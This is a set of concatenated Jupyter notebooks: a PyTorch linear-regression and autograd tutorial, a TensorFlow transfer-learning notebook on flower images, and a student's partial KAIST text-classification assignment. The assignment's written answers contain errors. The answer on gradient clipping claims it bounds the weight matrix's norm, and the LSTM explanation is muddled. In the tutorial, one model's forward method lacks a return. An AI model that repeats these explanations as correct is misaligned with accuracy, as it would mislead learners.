print(b_grad, w_grad)
```
## Step 4: Update the Parameters
```
# Sets learning rate - this is "eta" ~ the "n" like Greek letter
lr = 0.1
print(b, w)
# Step 4 - Updates parameters using gradients and
# the learning rate
b = b - lr * b_grad
w = w - lr * w_grad
print(b, w)
```
## Step 5: Rinse and Repeat!
```
# Go back to Step 1 and run observe how your parameters b and w change
```
# Linear Regression in Numpy
### Cell 1.2
```
# Step 0 - Initializes parameters "b" and "w" randomly
np.random.seed(42)
b = np.random.randn(1)
w = np.random.randn(1)
print(b, w)
# Sets learning rate - this is "eta" ~ the "n"-like Greek letter
lr = 0.1
# Defines number of epochs
n_epochs = 1000
for epoch in range(n_epochs):
# Step 1 - Computes model's predicted output - forward pass
yhat = b + w * x_train
# Step 2 - Computes the loss
# We are using ALL data points, so this is BATCH gradient
# descent. How wrong is our model? That's the error!
error = (yhat - y_train)
# It is a regression, so it computes mean squared error (MSE)
loss = (error ** 2).mean()
# Step 3 - Computes gradients for both "b" and "w" parameters
b_grad = 2 * error.mean()
w_grad = 2 * (x_train * error).mean()
# Step 4 - Updates parameters using gradients and
# the learning rate
b = b - lr * b_grad
w = w - lr * w_grad
print(b, w)
# Sanity Check: do we get the same results as our
# gradient descent?
linr = LinearRegression()
linr.fit(x_train, y_train)
print(linr.intercept_, linr.coef_[0])
fig = figure3(x_train, y_train)
```
# PyTorch
## Tensor
```
scalar = torch.tensor(3.14159)
vector = torch.tensor([1, 2, 3])
matrix = torch.ones((2, 3), dtype=torch.float)
tensor = torch.randn((2, 3, 4), dtype=torch.float)
print(scalar)
print(vector)
print(matrix)
print(tensor)
print(tensor.size(), tensor.shape)
print(scalar.size(), scalar.shape)
# We get a tensor with a different shape but it still is
# the SAME tensor
same_matrix = matrix.view(1, 6)
# If we change one of its elements...
same_matrix[0, 1] = 2.
# It changes both variables: matrix and same_matrix
print(matrix)
print(same_matrix)
# We can use "new_tensor" method to REALLY copy it into a new one
different_matrix = matrix.new_tensor(matrix.view(1, 6))
# Now, if we change one of its elements...
different_matrix[0, 1] = 3.
# The original tensor (matrix) is left untouched!
# But we get a "warning" from PyTorch telling us
# to use "clone()" instead!
print(matrix)
print(different_matrix)
# Lets follow PyTorch's suggestion and use "clone" method
another_matrix = matrix.view(1, 6).clone().detach()
# Again, if we change one of its elements...
another_matrix[0, 1] = 4.
# The original tensor (matrix) is left untouched!
print(matrix)
print(another_matrix)
```
## Loading Data, Devices and CUDA
```
x_train_tensor = torch.as_tensor(x_train)
x_train.dtype, x_train_tensor.dtype
float_tensor = x_train_tensor.float()
float_tensor.dtype
dummy_array = np.array([1, 2, 3])
dummy_tensor = torch.as_tensor(dummy_array)
# Modifies the numpy array
dummy_array[1] = 0
# Tensor gets modified too...
dummy_tensor
dummy_tensor.numpy()
```
### Defining your device
```
device = 'cuda' if torch.cuda.is_available() else 'cpu'
n_cudas = torch.cuda.device_count()
for i in range(n_cudas):
print(torch.cuda.get_device_name(i))
gpu_tensor = torch.as_tensor(x_train).to(device)
gpu_tensor[0]
```
### Cell 1.3
```
device = 'cuda' if torch.cuda.is_available() else 'cpu'
# Our data was in Numpy arrays, but we need to transform them
# into PyTorch's Tensors and then we send them to the
# chosen device
x_train_tensor = torch.as_tensor(x_train).float().to(device)
y_train_tensor = torch.as_tensor(y_train).float().to(device)
# Here we can see the difference - notice that .type() is more
# useful since it also tells us WHERE the tensor is (device)
print(type(x_train), type(x_train_tensor), x_train_tensor.type())
back_to_numpy = x_train_tensor.numpy()
back_to_numpy = x_train_tensor.cpu().numpy()
```
## Creating Parameters
```
# FIRST
# Initializes parameters "b" and "w" randomly, ALMOST as we
# did in Numpy since we want to apply gradient descent on
# these parameters we need to set REQUIRES_GRAD = TRUE
torch.manual_seed(42)
b = torch.randn(1, requires_grad=True, dtype=torch.float)
w = torch.randn(1, requires_grad=True, dtype=torch.float)
print(b, w)
# SECOND
# But what if we want to run it on a GPU? We could just
# send them to device, right?
torch.manual_seed(42)
b = torch.randn(1, requires_grad=True, dtype=torch.float).to(device)
w = torch.randn(1, requires_grad=True, dtype=torch.float).to(device)
print(b, w)
# Sorry, but NO! The to(device) "shadows" the gradient...
# THIRD
# We can either create regular tensors and send them to
# the device (as we did with our data)
torch.manual_seed(42)
b = torch.randn(1, dtype=torch.float).to(device)
w = torch.randn(1, dtype=torch.float).to(device)
# and THEN set them as requiring gradients...
b.requires_grad_()
w.requires_grad_()
print(b, w)
```
### Cell 1.4
```
# FINAL
# We can specify the device at the moment of creation
# RECOMMENDED!
# Step 0 - Initializes parameters "b" and "w" randomly
torch.manual_seed(42)
b = torch.randn(1, requires_grad=True, \
dtype=torch.float, device=device)
w = torch.randn(1, requires_grad=True, \
dtype=torch.float, device=device)
print(b, w)
```
# Autograd
## backward
### Cell 1.5
```
# Step 1 - Computes our model's predicted output - forward pass
yhat = b + w * x_train_tensor
# Step 2 - Computes the loss
# We are using ALL data points, so this is BATCH gradient descent
# How wrong is our model? That's the error!
error = (yhat - y_train_tensor)
# It is a regression, so it computes mean squared error (MSE)
loss = (error ** 2).mean()
# Step 3 - Computes gradients for both "b" and "w" parameters
# No more manual computation of gradients!
# b_grad = 2 * error.mean()
# w_grad = 2 * (x_tensor * error).mean()
loss.backward()
print(error.requires_grad, yhat.requires_grad, \
b.requires_grad, w.requires_grad)
print(y_train_tensor.requires_grad, x_train_tensor.requires_grad)
```
## grad
```
print(b.grad, w.grad)
# Just run the two cells above one more time
```
## zero_
```
# This code will be placed *after* Step 4
# (updating the parameters)
b.grad.zero_(), w.grad.zero_()
```
## Updating Parameters
### Cell 1.6
```
# Sets learning rate - this is "eta" ~ the "n"-like Greek letter
lr = 0.1
# Step 0 - Initializes parameters "b" and "w" randomly
torch.manual_seed(42)
b = torch.randn(1, requires_grad=True, \
dtype=torch.float, device=device)
w = torch.randn(1, requires_grad=True, \
dtype=torch.float, device=device)
# Defines number of epochs
n_epochs = 1000
for epoch in range(n_epochs):
# Step 1 - Computes model's predicted output - forward pass
yhat = b + w * x_train_tensor
# Step 2 - Computes the loss
# We are using ALL data points, so this is BATCH gradient
# descent. How wrong is our model? That's the error!
error = (yhat - y_train_tensor)
# It is a regression, so it computes mean squared error (MSE)
loss = (error ** 2).mean()
# Step 3 - Computes gradients for both "b" and "w" parameters
# No more manual computation of gradients!
# b_grad = 2 * error.mean()
# w_grad = 2 * (x_tensor * error).mean()
# We just tell PyTorch to work its way BACKWARDS
# from the specified loss!
loss.backward()
# Step 4 - Updates parameters using gradients and
# the learning rate. But not so fast...
# FIRST ATTEMPT - just using the same code as before
# AttributeError: 'NoneType' object has no attribute 'zero_'
# b = b - lr * b.grad
# w = w - lr * w.grad
# print(b)
# SECOND ATTEMPT - using in-place Python assigment
# RuntimeError: a leaf Variable that requires grad
# has been used in an in-place operation.
# b -= lr * b.grad
# w -= lr * w.grad
# THIRD ATTEMPT - NO_GRAD for the win!
# We need to use NO_GRAD to keep the update out of
# the gradient computation. Why is that? It boils
# down to the DYNAMIC GRAPH that PyTorch uses...
with torch.no_grad():
b -= lr * b.grad
w -= lr * w.grad
# PyTorch is "clingy" to its computed gradients, we
# need to tell it to let it go...
b.grad.zero_()
w.grad.zero_()
print(b, w)
```
## no_grad
```
# This is what we used in the THIRD ATTEMPT...
```
# Dynamic Computation Graph
```
# Step 0 - Initializes parameters "b" and "w" randomly
torch.manual_seed(42)
b = torch.randn(1, requires_grad=True, \
dtype=torch.float, device=device)
w = torch.randn(1, requires_grad=True, \
dtype=torch.float, device=device)
# Step 1 - Computes our model's predicted output - forward pass
yhat = b + w * x_train_tensor
# Step 2 - Computes the loss
# We are using ALL data points, so this is BATCH gradient
# descent. How wrong is our model? That's the error!
error = (yhat - y_train_tensor)
# It is a regression, so it computes mean squared error (MSE)
loss = (error ** 2).mean()
# We can try plotting the graph for any python variable:
# yhat, error, loss...
make_dot(yhat)
b_nograd = torch.randn(1, requires_grad=False, \
dtype=torch.float, device=device)
w = torch.randn(1, requires_grad=True, \
dtype=torch.float, device=device)
yhat = b_nograd + w * x_train_tensor
make_dot(yhat)
b = torch.randn(1, requires_grad=True, \
dtype=torch.float, device=device)
w = torch.randn(1, requires_grad=True, \
dtype=torch.float, device=device)
yhat = b + w * x_train_tensor
error = yhat - y_train_tensor
loss = (error ** 2).mean()
# this makes no sense!!
if loss > 0:
yhat2 = w * x_train_tensor
error2 = yhat2 - y_train_tensor
# neither does this :-)
loss += error2.mean()
make_dot(loss)
```
# Optimizer
## step / zero_grad
```
# Defines a SGD optimizer to update the parameters
optimizer = optim.SGD([b, w], lr=lr)
```
### Cell 1.7
```
# Sets learning rate - this is "eta" ~ the "n"-like Greek letter
lr = 0.1
# Step 0 - Initializes parameters "b" and "w" randomly
torch.manual_seed(42)
b = torch.randn(1, requires_grad=True, \
dtype=torch.float, device=device)
w = torch.randn(1, requires_grad=True, \
dtype=torch.float, device=device)
# Defines a SGD optimizer to update the parameters
optimizer = optim.SGD([b, w], lr=lr)
# Defines number of epochs
n_epochs = 1000
for epoch in range(n_epochs):
# Step 1 - Computes model's predicted output - forward pass
yhat = b + w * x_train_tensor
# Step 2 - Computes the loss
# We are using ALL data points, so this is BATCH gradient
# descent. How wrong is our model? That's the error!
error = (yhat - y_train_tensor)
# It is a regression, so it computes mean squared error (MSE)
loss = (error ** 2).mean()
# Step 3 - Computes gradients for both "b" and "w" parameters
loss.backward()
# Step 4 - Updates parameters using gradients and
# the learning rate. No more manual update!
# with torch.no_grad():
# b -= lr * b.grad
# w -= lr * w.grad
optimizer.step()
# No more telling Pytorch to let gradients go!
# b.grad.zero_()
# w.grad.zero_()
optimizer.zero_grad()
print(b, w)
```
# Loss
```
# Defines a MSE loss function
loss_fn = nn.MSELoss(reduction='mean')
loss_fn
# This is a random example to illustrate the loss function
predictions = torch.tensor([0.5, 1.0])
labels = torch.tensor([2.0, 1.3])
loss_fn(predictions, labels)
```
### Cell 1.8
```
# Sets learning rate - this is "eta" ~ the "n"-like
# Greek letter
lr = 0.1
# Step 0 - Initializes parameters "b" and "w" randomly
torch.manual_seed(42)
b = torch.randn(1, requires_grad=True, \
dtype=torch.float, device=device)
w = torch.randn(1, requires_grad=True, \
dtype=torch.float, device=device)
# Defines a SGD optimizer to update the parameters
optimizer = optim.SGD([b, w], lr=lr)
# Defines a MSE loss function
loss_fn = nn.MSELoss(reduction='mean')
# Defines number of epochs
n_epochs = 1000
for epoch in range(n_epochs):
# Step 1 - Computes model's predicted output - forward pass
yhat = b + w * x_train_tensor
# Step 2 - Computes the loss
# No more manual loss!
# error = (yhat - y_train_tensor)
# loss = (error ** 2).mean()
loss = loss_fn(yhat, y_train_tensor)
# Step 3 - Computes gradients for both "b" and "w" parameters
loss.backward()
# Step 4 - Updates parameters using gradients and
# the learning rate
optimizer.step()
optimizer.zero_grad()
print(b, w)
loss
loss.cpu().numpy()
loss.detach().cpu().numpy()
print(loss.item(), loss.tolist())
```
# Model
### Cell 1.9
```
class ManualLinearRegression(nn.Module):
def __init__(self):
super().__init__()
# To make "b" and "w" real parameters of the model,
# we need to wrap them with nn.Parameter
self.b = nn.Parameter(torch.randn(1,
requires_grad=True,
dtype=torch.float))
self.w = nn.Parameter(torch.randn(1,
requires_grad=True,
dtype=torch.float))
def forward(self, x):
# Computes the outputs / predictions
return self.b + self.w * x
```
## Parameters
```
torch.manual_seed(42)
# Creates a "dummy" instance of our ManualLinearRegression model
dummy = ManualLinearRegression()
list(dummy.parameters())
```
## state_dict
```
dummy.state_dict()
optimizer.state_dict()
```
## device
```
torch.manual_seed(42)
# Creates a "dummy" instance of our ManualLinearRegression model
# and sends it to the device
dummy = ManualLinearRegression().to(device)
```
## Forward Pass
### Cell 1.10
```
# Sets learning rate - this is "eta" ~ the "n"-like
# Greek letter
lr = 0.1
# Step 0 - Initializes parameters "b" and "w" randomly
torch.manual_seed(42)
# Now we can create a model and send it at once to the device
model = ManualLinearRegression().to(device)
# Defines a SGD optimizer to update the parameters
# (now retrieved directly from the model)
optimizer = optim.SGD(model.parameters(), lr=lr)
# Defines a MSE loss function
loss_fn = nn.MSELoss(reduction='mean')
# Defines number of epochs
n_epochs = 1000
for epoch in range(n_epochs):
model.train() # What is this?!?
# Step 1 - Computes model's predicted output - forward pass
# No more manual prediction!
yhat = model(x_train_tensor)
# Step 2 - Computes the loss
loss = loss_fn(yhat, y_train_tensor)
# Step 3 - Computes gradients for both "b" and "w" parameters
loss.backward()
# Step 4 - Updates parameters using gradients and
# the learning rate
optimizer.step()
optimizer.zero_grad()
# We can also inspect its parameters using its state_dict
print(model.state_dict())
```
## train
```
## Never forget to include model.train() in your training loop!
```
## Nested Models
```
linear = nn.Linear(1, 1)
linear
linear.state_dict()
```
### Cell 1.11
```
class MyLinearRegression(nn.Module):
def __init__(self):
super().__init__()
# Instead of our custom parameters, we use a Linear model
# with single input and single output
self.linear = nn.Linear(1, 1)
def forward(self, x):
# Now it only takes a call
self.linear(x)
torch.manual_seed(42)
dummy = MyLinearRegression().to(device)
list(dummy.parameters())
dummy.state_dict()
```
## Sequential Models
### Cell 1.12
```
torch.manual_seed(42)
# Alternatively, you can use a Sequential model
model = nn.Sequential(nn.Linear(1, 1)).to(device)
model.state_dict()
```
## Layers
```
torch.manual_seed(42)
# Building the model from the figure above
model = nn.Sequential(nn.Linear(3, 5), nn.Linear(5, 1)).to(device)
model.state_dict()
torch.manual_seed(42)
# Building the model from the figure above
model = nn.Sequential()
model.add_module('layer1', nn.Linear(3, 5))
model.add_module('layer2', nn.Linear(5, 1))
model.to(device)
```
# Putting It All Together
## Data Preparation
### Data Preparation V0
```
%%writefile data_preparation/v0.py
device = 'cuda' if torch.cuda.is_available() else 'cpu'
# Our data was in Numpy arrays, but we need to transform them
# into PyTorch's Tensors and then we send them to the
# chosen device
x_train_tensor = torch.as_tensor(x_train).float().to(device)
y_train_tensor = torch.as_tensor(y_train).float().to(device)
%run -i data_preparation/v0.py
```
## Model Configurtion
### Model Configuration V0
```
%%writefile model_configuration/v0.py
# This is redundant now, but it won't be when we introduce
# Datasets...
device = 'cuda' if torch.cuda.is_available() else 'cpu'
# Sets learning rate - this is "eta" ~ the "n"-like Greek letter
lr = 0.1
torch.manual_seed(42)
# Now we can create a model and send it at once to the device
model = nn.Sequential(nn.Linear(1, 1)).to(device)
# Defines a SGD optimizer to update the parameters
# (now retrieved directly from the model)
optimizer = optim.SGD(model.parameters(), lr=lr)
# Defines a MSE loss function
loss_fn = nn.MSELoss(reduction='mean')
%run -i model_configuration/v0.py
```
## Model Training
### Model Training V0
```
%%writefile model_training/v0.py
# Defines number of epochs
n_epochs = 1000
for epoch in range(n_epochs):
# Sets model to TRAIN mode
model.train()
# Step 1 - Computes model's predicted output - forward pass
yhat = model(x_train_tensor)
# Step 2 - Computes the loss
loss = loss_fn(yhat, y_train_tensor)
# Step 3 - Computes gradients for both "b" and "w" parameters
loss.backward()
# Step 4 - Updates parameters using gradients and
# the learning rate
optimizer.step()
optimizer.zero_grad()
%run -i model_training/v0.py
print(model.state_dict())
```
|
github_jupyter
|
# Transfer Learning
## Imports and Version Selection
```
# TensorFlow ≥2.0 is required for this notebook
import tensorflow as tf
from tensorflow import keras
assert tf.__version__ >= "2.0"
# check if GPU is available as this notebook will be very slow without GPU
if not tf.test.is_gpu_available():
print("No GPU was detected. CNNs can be very slow without a GPU.")
if IS_COLAB:
print("Go to Runtime > Change runtime and select a GPU hardware accelerator.")
import numpy as np
import matplotlib.pyplot as plt
import tensorflow as tf
import tensorflow_datasets as tfds
import numpy as np
from tensorflow.keras.datasets import mnist
from tensorflow.keras.layers import Dense, Activation, Input, Dropout, Conv2D, MaxPooling2D, Flatten, BatchNormalization, GaussianNoise
from tensorflow.keras.models import Model
import matplotlib.pyplot as plt
!pip install --upgrade deeplearning2020
from deeplearning2020 import helpers
# jupyters magic command
%matplotlib inline
# resize the images to a uniform size
def preprocess(image, label):
resized_image = tf.image.resize(image, [224, 224])
# run Xceptions preprocessing function
preprocessed_image = tf.keras.applications.xception.preprocess_input(resized_image)
return preprocessed_image, label
```
## Loading and Preprocessing
```
# download the dataset with labels and with information about the data
data, info = tfds.load("tf_flowers", as_supervised=True, with_info=True)
# print the most important information
dataset_size = info.splits['train'].num_examples
print('dataset size: ', dataset_size)
class_names = info.features['label'].names
print('class names: ', class_names)
n_classes = info.features['label'].num_classes
print('number of classes: ', n_classes)
batch_size = 32
try:
train_data = tfds.load('tf_flowers', split="train[:80%]", as_supervised=True)
test_data = tfds.load('tf_flowers', split="train[80%:100%]", as_supervised=True)
train_data = train_data.shuffle(1000).map(preprocess).batch(batch_size).prefetch(1)
test_data = test_data.map(preprocess).batch(batch_size).prefetch(1)
except(Exception):
# split the data into train and test data with a 8:2 ratio
train_split, test_split = tfds.Split.TRAIN.subsplit([8, 2])
train_data = tfds.load('tf_flowers', split=train_split, as_supervised=True)
test_data = tfds.load('tf_flowers', split=test_split, as_supervised=True)
train_data = train_data.shuffle(1000).map(preprocess).batch(batch_size).prefetch(1)
test_data = test_data.map(preprocess).batch(batch_size).prefetch(1)
# show some images from the dataset
helpers.plot_images(train_data.unbatch().take(9).map(lambda x, y: ((x + 1) / 2, y)), class_names)
```
## Definition and Training
```
from tensorflow.keras.applications.xception import Xception
from tensorflow.keras.layers import GlobalAveragePooling2D
# build a transfer learning model with Xception and a new Fully-Connected-Classifier
base_model = Xception(
weights='imagenet',
include_top=False
)
model = GlobalAveragePooling2D()(base_model.output)
model = Dropout(0.5)(model)
# include new Fully-Connected-Classifier
output_layer = Dense(n_classes, activation='softmax')(model)
# create Model
model = Model(base_model.input, output_layer)
model.summary()
# set the pretrained layers to not trainable because
# there are already trained and we don't want to destroy
# their weights
for layer in base_model.layers:
layer.trainable = False
```

```
model.compile(
optimizer=tf.keras.optimizers.SGD(lr=0.2, momentum=0.9, decay=0.01),
loss='sparse_categorical_crossentropy',
metrics=['accuracy']
)
history = model.fit(
train_data,
epochs=5,
validation_data=test_data
)
```

```
# to finetune the model, we have to set more layers to trainable
# and reduce the learning rate drastically to prevent
# destroying of weights
for layer in base_model.layers:
layer.trainable = True
# reduce the learning rate to not damage the pretrained weights
# model will need longer to train because all the layers are trainable
model.compile(
optimizer=tf.keras.optimizers.SGD(lr=0.01, momentum=0.9, decay=0.001),
loss='sparse_categorical_crossentropy',
metrics=['accuracy']
)
history_finetune=model.fit(
train_data,
epochs=10,
validation_data=test_data
)
```
## Visualization and Evaluation
```
# add the two histories and print the diagram
helpers.plot_two_histories(history, history_finetune)
```
# Transfer Learning with Data Augmentation
## Model Definition
```
from tensorflow.keras.applications.xception import Xception
from tensorflow.keras.layers import GlobalAveragePooling2D
# build a transfer learning model with Xception and a new Fully-Connected-Classifier
base_model_data_augmentation = Xception(
weights='imagenet',
include_top=False
)
model = GlobalAveragePooling2D()(base_model_data_augmentation.output)
model = Dropout(0.5)(model)
# include new Fully-Connected-Classifier
output_layer = Dense(n_classes, activation='softmax')(model)
# create Model
data_augmentation_model = Model(base_model_data_augmentation.input, output_layer)
```
## Adjust Data Augmentation
```
# resize the images to a uniform size
def preprocess_with_data_augmentation(image, label):
resized_image = tf.image.resize(image, [224, 224])
# data augmentation with Tensorflow
augmented_image = tf.image.random_flip_left_right(resized_image)
augmented_image = tf.image.random_hue(augmented_image, 0.08)
augmented_image = tf.image.random_saturation(augmented_image, 0.6, 1.6)
augmented_image = tf.image.random_brightness(augmented_image, 0.05)
augmented_image = tf.image.random_contrast(augmented_image, 0.7, 1.3)
# run Xceptions preprocessing function
preprocessed_image = tf.keras.applications.xception.preprocess_input(augmented_image)
return preprocessed_image, label
batch_size = 32
try:
train_data = tfds.load('tf_flowers', split="train[:80%]", as_supervised=True)
except(Exception):
# split the data into train and test data with a 8:2 ratio
train_split, test_split = tfds.Split.TRAIN.subsplit([8, 2])
train_data = tfds.load('tf_flowers', split=train_split, as_supervised=True)
augmented_train_data = train_data.map(preprocess_with_data_augmentation).batch(batch_size).prefetch(1)
```
## Training
```
# set the pretrained layers to not trainable because
# there are already trained and we don't want to destroy
# their weights
for layer in base_model_data_augmentation.layers:
layer.trainable = False
data_augmentation_model.compile(
optimizer=tf.keras.optimizers.SGD(lr=0.2, momentum=0.9, decay=0.01),
loss='sparse_categorical_crossentropy',
metrics=['accuracy']
)
history_data_augmentation = data_augmentation_model.fit(
augmented_train_data,
epochs=3,
validation_data=test_data
)
```
## Finetuning
```
# to finetune the model, we have to set more layers to trainable
# and reduce the learning rate drastically to prevent
# destroying of weights
for layer in base_model_data_augmentation.layers:
layer.trainable = True
# reduce the learning rate to not damage the pretrained weights
# model will need longer to train because all the layers are trainable
data_augmentation_model.compile(
optimizer=tf.keras.optimizers.SGD(lr=0.01, momentum=0.9, decay=0.001),
loss='sparse_categorical_crossentropy',
metrics=['accuracy']
)
history_finetune_data_augmentation = data_augmentation_model.fit(
augmented_train_data,
epochs=30,
validation_data=test_data
)
```
## Visualization
```
# add the two histories and print the diagram
helpers.plot_two_histories(history_data_augmentation, history_finetune_data_augmentation)
```
|
github_jupyter
|
# KAIST AI605 Assignment 1: Text Classification
TA in charge: Miyoung Ko (miyoungko@kaist.ac.kr)
**Due Date:** September 29 (Wed) 11:00pm, 2021
## Your Submission
If you are a KAIST student, you will submit your assignment via [KLMS](https://klms.kaist.ac.kr). If you are a NAVER student, you will submit via [Google Form](https://forms.gle/aGZZ86YpCdv2zEVt9).
You need to submit both (1) a PDF of this notebook, and (2) a link to CoLab for execution (.ipynb file is also allowed).
Use in-line LaTeX (see below) for mathematical expressions. Collaboration among students is allowed but it is not a group assignment so make sure your answer and code are your own. Make sure to mention your collaborators in your assignment with their names and their student ids.
## Grading
The entire assignment is out of 20 points. You can obtain up to 5 bonus points (i.e. max score is 25 points). For every late day, your grade will be deducted by 2 points (KAIST students only). You can use one of your no-penalty late days (7 days in total). Make sure to mention this in your submission. You will receive a grade of zero if you submit after 7 days.
## Environment
You will only use Python 3.7 and PyTorch 1.9, which is already available on Colab:
```
from platform import python_version
import torch
print("python", python_version())
print("torch", torch.__version__)
```
## 1. Limitations of Vanilla RNNs
In Lecture 02, we saw that a multi-layer perceptron (MLP) without activation function is equivalent to a single linear transformation with respect to the inputs. One can define a vanilla recurrent neural network without activation as, given inputs $\textbf{x}_1 \dots \textbf{x}_T$, the outputs $\textbf{h}_t$ is obtained by
$$\textbf{h}_t = \textbf{V}\textbf{h}_{t-1} + \textbf{U}\textbf{x}_t + \textbf{b},$$
where $\textbf{V}, \textbf{U}, \textbf{b}$ are trainable weights.
> **Problem 1.1** *(2 point)* Show that such recurrent neural network (RNN) without activation function is equivalent to a single linear transformation with respect to the inputs, which means each $\textbf{h}_t$ is a linear combination of the inputs.
In Lecture 05 and 06, we will see how RNNs can model non-linearity via activation function, but they still suffer from exploding or vanishing gradients. We can mathematically show that, if the recurrent relation is
$$ \textbf{h}_t = \sigma (\textbf{V}\textbf{h}_{t-1} + \textbf{U}\textbf{x}_t + \textbf{b}) $$
then
$$ \frac{\partial \textbf{h}_t}{\partial \textbf{h}_{t-1}} = \text{diag}(\sigma' (\textbf{V}\textbf{h}_{t-1} + \textbf{U}\textbf{x}_t + \textbf{b}))\textbf{V}$$
so
$$\frac{\partial \textbf{h}_T}{\partial \textbf{h}_1} \propto \textbf{V}^{T-1}$$
which means this term will be very close to zero if the norm of $\bf{V}$ is smaller than 1 and really big otherwise.
> **Problem 1.2** *(2 points)* Explain how exploding gradient can be mitigated if we use gradient clipping.
> **Problem 1.3** *(2 points)* Explain how vanishing gradient can be mitigated if we use LSTM. See the Lecture 05 and 06 slides for the definition of LSTM.
## (Answer)
**Problem 1.1.**
For every $t$, $\mathbf{h}_t$ is recursively defined as
$$ \mathbf{h}_t = \mathbf{V}\mathbf{h}_{t-1} + \mathbf{U}\mathbf{x}_t + \mathbf{b} = \mathbf{V}(\mathbf{V}\mathbf{h}_{t-2} + \mathbf{U}\mathbf{x}_{t-1} + \mathbf{b}) + \mathbf{U}\mathbf{x}_t + \mathbf{b}$$
$$ =\cdots = \mathbf{V}^t\mathbf{h}_0 + \sum_{k=0}^{t-1} \mathbf{V}^{k}\mathbf{U}\mathbf{x}_{t-k} + \sum_{k=0}^{t-1} \mathbf{V}^k \mathbf{b} $$
which is a linear combination of the inputs $\mathbf{x}_1,\mathbf{x}_2,\cdots,\mathbf{x}_t$. This holds for every $t$, therefore RNN without non-linear activation function is equiavlent to a single linear transformation of the inputs.
**Problem 1.2.**
If we use gradient clipping, the norm of $\mathbf{V}$ does not exceed some value, i.e., 1. Then, the gradient $\frac{\partial\mathbf{h}_T}{\partial\mathbf{h}_1}$ can be reduced, mitigating the exploding gradient issue.
**Problem 1.3.**
In LSTM, activation function helps avoiding vanishing gradient. In the recurrency of the LSTM, the activation function is the identity function with a derivative of 1.0. Specifically, the effective weight of the recurrency is equal to the forget gate activation. So, if the forget gate is on (activation close to 1.0), the gradient does not vanish.
## 2. Creating Vocabulary from Training Data
Creating the vocabulary is the first step for every natural language processing model. In this section, you will use Stanford Sentiment Treebank (SST), a popular dataset for sentiment classification, to create your vocabulary.
### Obtaining SST via Hugging Face
We will use `datasets` package offered by Hugging Face, which allows us to easily download various language datasets, including Stanford Sentiment Treebank.
First, install the package:
```
!pip install datasets
```
Then download SST and print the first example:
```
from datasets import load_dataset
from pprint import pprint
sst_dataset = load_dataset('sst')
pprint(sst_dataset['train'][0])
```
Note that each `label` is a score between 0 and 1. You will round it to either 0 or 1 for binary classification (positive for 1, negative for 0).
In this first example, the label is rounded to 1, meaning that the sentence is a positive review.
You will only use `sentence` as the input; please ignore other values.
> **Problem 2.1** *(2 points)* Using space tokenizer, create the vocabulary for the training data and report the vocabulary size here. Make sure that you add an `UNK` token to the vocabulary to account for words (during inference time) that you haven't seen. See below for an example with a short text.
## (Answer)
**Problem 2.1.**
Vocabulary size is 18282, including 'PAD' and 'UNK' token. (see the code below)
```
# Space tokenization
text = "Hello world!"
tokens = text.split(' ')
print(tokens)
# Constructing vocabulary with `UNK`
vocab = ['PAD', 'UNK'] + list(set(text.split(' ')))
word2id = {word: id_ for id_, word in enumerate(vocab)}
print(vocab)
print(word2id['Hello'])
### Problem 2.1 ###
vocab = ['PAD', 'UNK']
for data in sst_dataset['train']:
for word in data['sentence'].split(' '):
if word not in vocab:
vocab.append(word)
word2id = {word: id_ for id_, word in enumerate(vocab)}
print('Vocabulary size: {}'.format(len(vocab)))
```
> **Problem 2.2** *(1 point)* Using all words in the training data will make the vocabulary very big. Reduce its size by only including words that occur at least 2 times. How does the size of the vocabulary change?
## (Answer)
**Problem 2.2.**
Vocabulary size is now 8738, including 'PAD' and 'UNK' token. (see the code below)
```
### Problem 2.2 ###
vocab = ['PAD', 'UNK']
vocab_count = {}
for data in sst_dataset['train']:
for word in data['sentence'].split(' '):
if word not in vocab and word not in vocab_count.keys():
vocab_count[word] = 1
elif word not in vocab and word in vocab_count.keys():
vocab_count[word] += 1
if vocab_count[word] >= 2:
vocab.append(word)
else:
continue
word2id = {word: id_ for id_, word in enumerate(vocab)}
print('Vocabulary size: {}'.format(len(vocab)))
```
## 3. Text Classification with Multi-Layer Perceptron and Recurrent Neural Network
You can now use the vocabulary constructed from the training data to create an embedding matrix. You will use the embedding matrix to map each input sequence of tokens to a list of embedding vectors. One of the simplest baseline is to fix the input length (with truncation or padding), flatten the word embeddings, apply a linear transformation followed by an activation, and finally classify the output into the two classes:
```
from torch import nn
length = 8
input_ = "hi world!"
input_tokens = input_.split(' ')
input_ids = [word2id[word] if word in word2id else 1 for word in input_tokens] # UNK if word not found
if len(input_ids) < length:
input_ids = input_ids + [0] * (length - len(input_ids)) # PAD tokens at the end
else:
input_ids = input_ids[:length]
input_tensor = torch.LongTensor([input_ids]) # the first dimension is minibatch size
print(input_tensor)
# Two-layer MLP classification
class Baseline(nn.Module):
def __init__(self, d, length):
super(Baseline, self).__init__()
self.embedding = nn.Embedding(len(vocab), d)
self.layer = nn.Linear(d * length, d, bias=True)
self.relu = nn.ReLU()
self.class_layer = nn.Linear(d, 2, bias=True)
def forward(self, input_tensor):
emb = self.embedding(input_tensor) # [batch_size, length, d]
emb_flat = emb.view(emb.size(0), -1) # [batch_size, length*d]
hidden = self.relu(self.layer(emb_flat))
logits = self.class_layer(hidden)
return logits
d = 3 # usually bigger, e.g. 128
baseline = Baseline(d, length).cuda()
logits = baseline(input_tensor.cuda())
softmax = nn.Softmax(1)
print(softmax(logits)) # probability for each class
```
Now we will compute the loss, which is the negative log probability of the input text's label being the target label (`1`), which in fact turns out to be equivalent to the cross entropy (https://en.wikipedia.org/wiki/Cross_entropy) between the probability distribution and a one-hot distribution of the target label (note that we use `logits` instead of `softmax(logits)` as the input to the cross entropy, which allow us to avoid numerical instability).
```
cel = nn.CrossEntropyLoss()
label = torch.LongTensor([1]).cuda() # The ground truth label for "hi world!" is positive.
loss = cel(logits, label) # Loss, a.k.a L
print(loss)
```
Once we have the loss defined, only one step remains! We compute the gradients of parameters with respective to the loss and update. Fortunately, PyTorch does this for us in a very convenient way. Note that we used only one example to update the model, which is basically a Stochastic Gradient Descent (SGD) with minibatch size of 1. A recommended minibatch size in this exercise is at least 16. It is also recommended that you reuse your training data at least 10 times (i.e. 10 *epochs*).
```
optimizer = torch.optim.SGD(baseline.parameters(), lr=0.1)
optimizer.zero_grad() # reset process
loss.backward() # compute gradients
optimizer.step() # update parameters
```
Once you have done this, all weight parameters will have `grad` attributes that contain their gradients with respect to the loss.
```
print(baseline.layer.weight.grad) # dL/dw of weights in the linear layer
```
> **Problem 3.1** *(2 points)* Properly train a MLP baseline model on SST and report the model's accuracy on the dev data.
